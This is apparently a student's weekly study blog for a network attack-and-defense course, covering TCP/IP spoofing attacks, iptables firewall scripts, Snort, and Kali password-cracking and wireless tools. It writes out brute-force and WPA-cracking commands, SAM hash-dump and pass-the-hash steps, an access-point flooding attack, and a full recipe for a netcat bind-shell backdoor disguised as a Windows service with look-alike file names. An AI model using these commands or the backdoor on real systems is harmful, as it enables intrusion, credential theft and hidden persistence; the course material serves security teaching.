孙星

20169221 2016-2017-2 《网络攻防》第六周学习总结

教材学习内容总结

第五章 TCP/IP网络协议攻击

1.TCP/IP网络协议栈攻击

  • 网络安全属性与攻击模式
    1)网络安全属性:机密性、完整性、可用性、真实性、不可抵赖性
    2)网络攻击的基本模式:截获、中断、篡改与伪造。
  • TCP/IP网络协议栈安全缺陷与攻击技术
    1)网络层接口:当网络层接口处于混杂模式下时,则可直接进行嗅探并截获数据包
    2)互联层:负责提供基本的数据封包传送功能,让每一块数据包都能够到达目的主机(但不检查是否被正确接收),如网际协议(IP)。
    3)传输层:提供了节点间的数据传送服务,如传输控制协议(TCP)、用户数据报协议(UDP)等,TCP和UDP给数据包加入传输数据并把它传输到下一层中 。
    4)应用层:对实际的网络媒体的管理,定义如何使用实际网络(如Ethernet、Serial Line等)来传送数据。
  • 原始报文伪造技术及工具
    实现欺骗技术需要攻击者提供特指网络数据报文,发送给目标主机,使其在接受处理这些伪造报文时候遭到攻击.
    利用开源的Netwox工具来亲身体验基础网络协议攻击的过程
    2.网络层协议攻击
  • IP源地址欺骗
    1)IP源地址欺骗欺骗原理
    2)IP源地址欺骗技术和应用场景
    3)利用Netwox进行IP源地址欺骗
    4)防范措施
  • ARP欺骗
    中毒的机器会伪造某台电脑的MAC地址,如该伪造地址为网关服务器的地址,那么对整个网络均会造成影响,用户表现为上网经常瞬断。
    1)ARP协议工作原理
    2)ARP攻击欺骗原理
    3)ARP攻击欺骗技术和应用场景
    4)利用Netwox进行ARP欺骗
    5)防范措施
  • ICMP路由重定向攻击
    1)ICMP路由重定向攻击机制原理
    1)ICMP路由重定向攻击技术
    1)利用Netwox进行ICMP路由重定向攻击
    1)ICMP路由重定向攻击防范措施
    3.传输层协议攻击
  • TCP RST攻击
  • TCP会话劫持攻击
  • TCP SYN Flood拒绝服务攻击
  • UDP Flood拒绝服务攻击
    4.TCP/IP网络协议栈攻击防范措施
    监测预防与安全加固
    网络安全协议

书上实践


C:WINNTsystem32>arp -a
Interface:192.168.100.93 on Interface 0x1000003
Internet Address Physical Address Type
192.168.100.1 00-50-da-8a-62-2c dynamic
192.168.100.23 00-11-2f-43-81-8b dynamic
192.168.100.24 00-50-da-8a-62-2c dynamic
192.168.100.25 00-05-5d-ff-a8-87 dynamic
192.168.100.200 00-50-ba-fa-59-fe dynamic
带病毒机器显示正确
C:WINNTsystem32>arp -a
Interface:192.168.100.24 on Interface 0x1000003
Internet Address Physical Address Type
192.168.100.1 00-02-ba-0b-04-32 dynamic
192.168.100.23 00-11-2f-43-81-8b dynamic
192.168.100.25 00-05-5d-ff-a8-87 dynamic
192.168.100.193 00-11-2f-b2-9d-17 dynamic
192.168.100.200 00-50-ba-fa-59-fe dynamic
所有mac地址被修改
C:WINNTsystem32>arp -a
Interface:192.168.100.1 on Interface 0x1000004
Internet Address Physical Address Type
192.168.100.23 00-50-da-8a-62-2c dynamic
192.168.100.24 00-50-da-8a-62-2c dynamic
192.168.100.25 00-50-da-8a-62-2c dynamic
192.168.100.193 00-50-da-8a-62-2c dynamic
192.168.100.200 00-50-da-8a-62-2c dynamic

第六章 网络安全防范技术

1.安全模型
2.网络安全防范技术与系统

  • 防火墙技术
    防火墙的功能
    防火墙的不足
  • 防火墙技术和产品
    包过滤技术
    基于状态检测的包过滤技术
    代理技术
    防火墙产品
    防火墙部署方法
  • linux开源防火墙netflter/iptables
  • 动手实践:防火墙配置
    1、修改本机ip为10.3.1.(X+100),其中X为WinXP IP的最后一位
    2、编写脚本iptest.sh,功能如下:
    A
    (1)iptest.sh清空所有存在的规则;
    (2)只开放22号端口(ssh、tcp);
    (3)禁止发送icmp包;
    (4)INPUT默认规则为DROP;
    (5)OUTPUT默认规则为ACCEPT;
    (6)FORWARD默认规则为DROP ;
    B```

!/bin/sh

清空所有规则

sudo iptables -t filter -F

只开放22端口

sudo iptables -t filter -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -t filter -A OUTPUT -p tcp --sport 22 -j ACCEPT

禁止发送ICMP包

sudo iptables -t filter -A OUTPUT -p icmp -j DROP

INPUT默认规则为DROP

sudo iptables -t filter -P INPUT DROP

OUTPUT默认规则为ACCEPT

sudo iptables -t filter -P OUTPUT ACCEPT

FORWARD默认规则为DROP

sudo iptables -t filter -P FORWARD DROP

保存设置

!/bin/sh

不清空规则,所以没有-F

只允许ICMP通过

这里有必要说一下:-A是加在链的最后,-I是插入链中(默认插在链头),而且下面命令中第1条和第2条之间的顺序不能改变,不然第2条命令相当于没用

sudo iptables -t filter -I OUTPUT -j DROP
sudo iptables -t filter -I OUTPUT -p icmp -j ACCEPT
sudo iptables -t filter -A INPUT -p icmp -j ACCEPT

禁止22端口

sudo iptables -t filter -I INPUT -p tcp --dport 22 -j DROP

注意:如果想要后面加上的规则优先于之前的规则,记住把新加的规则放在链的头部。

![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409034502503-830392260.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409034518800-783118095.png)
3、iptest.sh能随系统启动。
- 其他网络防御技术
  vpn
  内网安全管理
  内容安全管理SCM
  统一威胁管理
3.网络监测技术与系统
- 入侵检测技术概述
  入侵检测技术基本概念与发展过程
  入侵检测技术评估指标
  入侵检测技术
  入侵检测系统的分类与部署
  入侵防御系统IPS
- 开源网络入侵检测系统snort
  Snort基本介绍
  Snort的特性与基本架构
  Snort的实现机理
  Snort的安装与使用
- 实践snort
[snort策略配置分析](http://blog.chinaunix.net/uid-17150-id-2824014.html)
4.网络安全事件响应技术


# 视频学习内容总结
## 密码攻击之在线工具
1.Cewl :是一个很酷的工具,可以爬行网站获取关键信息创建一个密码字典。它的官网:http://digi.ninja/projects/cewl.php
爬行一个URL,通过提取返回页面源码特定标签中的内容,把关键词拼接成一个字典。

2.CAT(Cisco-Auditing-Tool):一个很小的安全审计工具,扫描Cisco路由器的一般性漏洞:例如默认密码,SMAPcommunity字串和一些老的IOS bug。

3.Findmyhash:在线哈希破解工具,借助在线破解哈西网站的接口制作工具。
测试MD5的哈希值 ```findmyhash MD5 -h 哈希值 ```连接各个网站的接口看能否反查到哈希的原来的字符串。

4.老牌破解工具Hydra
破解FTP服务:```hydra -L user.txt -P Pass.txt -F ftp://127.0.0.1:21```
破解SSH服务:```hydra -L user.txt -P Pass.txt -F ssh://127.0.0.1:22```
破解SMB服务:```hydra -L user.txt -P Pass.txt -F smb://127.0.0.1```
破解MSSQL服务:```hydra -L user.txt -P Pass.txt -F mssql://127.0.0.1:1433```
被猜解出来就会有一个高亮显示
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020502300-490297989.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020527160-182120068.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020546113-1458240902.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020901488-1371864506.png)

5.Medusa:类似Hydra一款工具
```Medusa -h 192.168.235.96 -u root -P//wordlists/rockyou.txt -M ssh```
如果选择服务器只需改变-m后面的参数即可。
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020631238-1191290607.png)

6.NCrack
相似功能基本类似,但突出了RDP(3389)爆破功能
```ncrack -vv -U windows.user -P windows.pwd 192.168.1.101:3389,CL=1 -f```

7.Onesixtyone:是一个snmp扫描工具用于找出设备上的SNMP Community字串,扫描速度非常快。

8.Patator是用python编程的多服务破解工具,如枚举一个服务用户名密码
```patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'```

9.phrasen|drescher:多线程支持插件式的密码破解工具

10.THC-PPTP-Bruter:针对PPTP VPN端点(TCP端口1723)的暴力破解程序,支持最新的MSChapV2验证,对windows和cisco网关测试通过。用以探测微软的Anti-Brute Force Implementation中存在的一个漏洞,并通过此漏洞,尝试每秒300个密码进行暴力破解。

##密码攻击之离线攻击
1.Creddump套件:Cache-dump、Isadump与pwdump均为套件中的一部分,基于python的哈西抓取工具
项目地址:http://code.google.com/p/creddump/source/checkout

2.Chntpw:用来修改WindowSAM文件实现系统密码修改,亦可在Kali作为启动盘时伸出密码的用途。

3.Crunch:实用的密码字典生成工具,可以指定位数生成暴力枚举字典。
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409020940441-1460849030.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409021017410-446445250.png)

4.Dictstat:一款字典分析工具,可以分析出一个县有字典的分布状况,也可按照一定的过滤器提取字典。同一项目下工具还有MaskGen和PolicyGEN

5.Fcrackzip:一款ZIP压缩包密码破解工具

6.Hashcat:强大的密码破解软件,系列软件包含Hashcat、oclHashcat,Hashcat只支持CPU破解;oclHashcat和oclGausscrack则支持gpu加速,oclHashcat分为AMD和NIVDA版本
-m (--hash-type=NUM)  hash种类,下面有列表,后面对应数字
-a (--attack-mode=NUM) 破解模式,下面也有列表
attack-mode
    0=Straight(字典破解)
    1=Combination(组合破解)
    2=Toggle-case
    3=Brute-force(掩码暴力破解)
    4=Permutation(组合破解)
    5=Table-Lookup
对应8位纯数字组合:?d?d?d?d?d?d?d?d
对应前四位小写字母后四位数字组合:?l?l?l?l?d?d?d?d

7.Hashid:简单易用的hash分析工具,可以判断哈希或哈希文件是何种哈希算法加密的。

9.John the ripper:老牌密码破解工具,常用语Linux Shadow中账户和密码的破解,社区版支持MD5-RAW等哈希值破解。

10.Johnny:图形化的John

##密码攻击之离线攻击(2)
1.Ophcrack:彩虹表密码Hash破解工具对应有命令行版的ophcrack-cli,可以从官网下载部分彩虹表。
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170408222921925-1219092965.png)
官网提供彩虹表可以下载,lode后就可以用来破解密码哈希。

2.Pyrit:无线网密码破解工具,借助GPU加速,让WPA2密码破解更有效率,使用analyze检查抓到的包```pyrit -r xxx.cap analyze```;开始跑包```pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough```,也可将PYRIT与CRUNCH结合使用```crunch 8 8 1234567890 | pyrit -i - -r /file/hack01-cap -b bssid attack_passthrough```
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170408234823816-752875344.png)

3.Rcrack:彩虹表密码哈希破解工具,使用了第一代彩虹表(RT格式)

4.Rcracki_mt:一款彩虹表哈希破解工具,支持持最新格式的彩虹表进行哈西破解,彩虹表仍是不可缺少的关键

5.Rsmangler:字典处理工具,可以生成几个字符串的所有组合形式,在生成社工字典时亦可用到,可以有选择性的关闭某些选项。
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170408235921957-928303978.png)
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409000357941-325321136.png)
把所有可能字串贴出,可以转换大小写
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409000621785-1200139968.png)

6.Samdump2和BKhive
LINUX下破解windows下的哈希的工具
首先获取win下的文件:SAM文件 C:\windows\systen32\config\SAM    system文件: C:\windows\systen32\config\system
先用bkhive从system生成一个bootkey文件 ````bkhive system bootkey```
再用bootkey和SAM文件通过Samdump2生成一个密码hash文件```samdump2 SAM bootkey>hashes```
接着使用john破解john hashes即可。

7.SIPCrack:针对SIPprotocol协议数据包的破解工具,支持PCAP数据包与字典破解。

8.SUCrack:借助su命令进行本地账户密码破解。

9.Truecrack:一款针对TrueCrypt加密文件密码破解工具。

##密码攻击之哈希传递
1.Pass the hash套件
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409002924863-974706291.png)
要进行哈希传递攻击,首先要有目标主机的哈希信息,以PWDUMP7抓取的hash为例.
PHT套件的每个工具都针对WIN下响应exe文件,使用pth-winexe可以借助哈西执行程序得到一个cmdshell。

2.Keimpx:一款python编写的哈希传递工具,可以通过自己的哈西信息GET一个后门SHELL
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409021136988-1390346230.png)
- 使用PWDUMP抓取哈希,将文件保存至根目录,使用keimpx的-c参数使用此文件作为凭据
- 检测到Administrator可以进行哈希传递攻击,是否获得一个SHELL
- 默认选项获得SHELL,输入SHELL命令得到一个后门SHELL
- 可以看到后门绑定的端口号也可以使用NC直接连接得到一个shell

3.Metaspolit
模块 exploit/windows/smb/pxexec亦可完成HASH传递攻击。

##无线安全分析工具
- RFID/NFC工具:IC卡的攻击和破解,有时需要一套专业的分析硬件入PROXMARK3
- 软件定义无线电:轻松破除汽车的防护
- 蓝牙工具集:蓝牙安全检测工具
- 无线网分析工具:BackTrack系列曾以此闻名,包括Aircrack-ng无线网络分析套件

1.Aircrack:是一套用于破解WEP和WPA的工具套装,一般用于无线网络的密钥破解,从而非法进入未经许可的无线网络.Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
套件包含
![](http://images2015.cnblogs.com/blog/1115797/201704/1115797-20170409024542003-1968117830.png)
2.Cowpaity:一款知名WPA-PSK握手包密码破解工具
3.EAPMD5PASS:针对EAP-MD5密码破解工具
4.图形化的Fera Wifi Cracker
5.MDK3:首先检测网卡: ifconfig -a  然后模拟端口: airmon-ng start wlan0 接下来用:  airodump-ng mon0  扫描ap找到你pin死的路由器mac 用mdk3 做身份验证攻击  mdk3 mon0 a -a mac(被pin死的路由器的mac) 身份验证攻击效果说明:  此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 说明:  此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。
6.Wifite:自动化无线网审计工具,王城自动化破解。python编写,结合Aircrack-ng套件和Reaver工具
7.Reaver:对开启WPS的路由器pin码进行破解
#教材学习中的问题和解决办法
- 问题1:如何用NC打造后门
- 解决方法:
首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc.exe(这个是操作服务的一个小工具,被人称为操作服务的军刀),这些就可以打造我们自己的后门了,后门的要求我想不需要很强的操作功能,只需要当我们连接的时候获得一个system权限的shell就可以了,有了cmdshell做什么不可以呢。如果你需要反弹的后门,也可以做到,自己注册个域名就可以用nc反弹了,因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具,我们来看看nc的帮助,命令行下输入nc -h就可以看到,我们主要用到的几个参数如下: 
-e 绑定一个程序并且连接时执行 
-l 监听模式 
-p 指定nc要运行的本地端口 
-L 增强了的监听模式,当连接断开时再次监听
  至于其他的用法相信各位已经很了解了的,我们以前经常用到的是 
```nc -l -e cmd.exe -p 8888 \\监听8888端口,当有连接时重定向到cmd.exe实现绑定一个shell\\ ```
  这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888,我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后监听的端口就会关闭,是一次性的,不能再次获得shell,这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持监听的状态,可以反复连接。用 
```nc -L -e cmd.exe -p 8888 \\也是绑定的,不过加强了的\\ ```
  这样的命令就已经达到我们的目的了,但是我们往往是在溢出的shell里工作,留后门是为了以后的进入,那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢?你可以把他放到注册表的Run等启动项下面,但是感觉那样不是太好,有些地方已经被杀毒软件盯上了,把我的后门放到那里实在不是很放心,后来想到干脆作成服务吧!随着系统启动而启动,呵呵。那就看看如何打造服务吧! 
  首先我们将nc.exe放到%systemroot%\system32下面,起名叫svch0st.exe或者放到%systemroot%\system下面更名叫svchost.exe,这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务,不用改别的,只要修改他的执行路径就可以了,我们就改那个clipsrv.exe服务吧!命令如下: 
```sc config clipsrv start= auto \\将clipsrv.exe服务设置为自动\\ ```
```sc config clipsrv binpath= "c:\winnt\system32\svch0st.exe -L -e cmd.exe -p 8888" \\设置clipsrv.exe服务的启动路径为我们的nc\\ ```
```sc start clipsrv \\启动clipsrv.exe服务\\ ```
但是看看结果吧!看看服务里的显示信息,如图一,很显眼哦!不管,先启动服务然后 
netstat -an find "8888" \\netstat -an的结果中查找8888看我们的程序是否运行\\ 
 的确是已经被打开了,但是当显示服务没有响应的时候nc的进程被结束了,这是Windows服务管理机制吧。不是很成功呵,我们继续改造!不懂编程的我们这个时候就会很郁闷,因为不能让服务停止响应的时候我开始想用bat2exe.exe,但是启动服务的时候总是出现拒绝访问的错误,大概是bat2exe出来的exe文件不被系统服务格式所支持,只能想其他的办法了,于是我想到了用Winrar.exe来做我们自己的exe文件,这总该被服务的可执行文件支持吧!至于如何实现编程里的子进程在父进程终止后仍然可以在内存中运行,我用的方法是写个run.vbs然后用cscript.exe来调用,至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run.vbs,如图三。其中Run.vbs里的内容如下: 
```dim sh \\定义变量\\ 
set sh=createobject("wscript.shell") \\取得WSH对象\\ 
sh.run "nc -L -e cmd.exe -p 8888",0 \\执行我们的程序并隐藏错误\\ ```
  而自解压的路径写上%systemroot%\system32,这样我们自解压服务程序就做好了,保存为c1ipsrv.exe(不好意思,还是用那个1和l的把戏),放到c:\winnt\system32目录下面。现在修改我们的clipsrv剪切薄服务的具体路径为c:\winnt\system32\c1ipsrv.exe,命令如下: 
```sc stop clipsrv \\将clipsrv.exe服务设置为自动\\ 
sc config clipsrv start= auto 
sc config clipsrv binpath= "c:\winnt\system32\c1ipsrv.exe" \\设置clipsrv.exe服务的启动路径为我们的nc\\ 
sc start clipsrv \\启动clipsrv.exe服务\\ ```
  现在一切OK了,这样以来我们的程序的参数细节还会被屏蔽,比开始的参数直接放到执行文件路径里好多了。我们来实验下。先net start clipsrv,然后netstat -an find "8888"看看开没开8888端口,最后用nc 127.0.0.1 8888连接上去得到shell了呵!如图四。好了,快去体验自己动手的快乐哦,你还可以作其他的事情,只要你的服务的程序做的够好,甚至可以用反向回来的nc。

#上周考试错题总结
- 黑客地下经济链中玩家不参与底线黑石进行交易。
- Web应用安全辅助分析工具有TamperData、Burp Suite、HP Webinspect
- SQL注入和XSS攻击的共同原理是输入检查不充分,数据代码没有分离
- cat f1.txt>f2.txt可以复制f1为f2
#博客评论
[王亚琼](http://www.cnblogs.com/wangyaqiong/p/6653080.html)
[于澎](http://www.cnblogs.com/yp1692/p/6628949.html)
[赵会](http://www.cnblogs.com/zhaohui801/p/6657578.html)
[毛卫华](http://www.cnblogs.com/weihua2616/p/6654710.html)

#学习进度条
|          |教材学习      |视频学习        |博客量(新增/累积)|重要成长                                     |
|:--------:|:-----------:|:-------------:|:--------------:|-------------------------------------------|
|目标       |12章         |               |20篇           |                                              |
|     1     |第五六章        |《网络攻防》|1/3            |                                              |
|  第六周   |视频学习        |5个kali视频 |2/3            | 密码分析工具与无线安全分析工具               |         
#参考资料
[域渗透——Pass The Hash & Pass The Key](http://www.v4.cc/News-749416.html)
[汽车防护](http://greekcar.net/archives/7748)

posted on 2017-04-05 14:52  20169221孙星  阅读(443)  评论(4编辑  收藏  举报

导航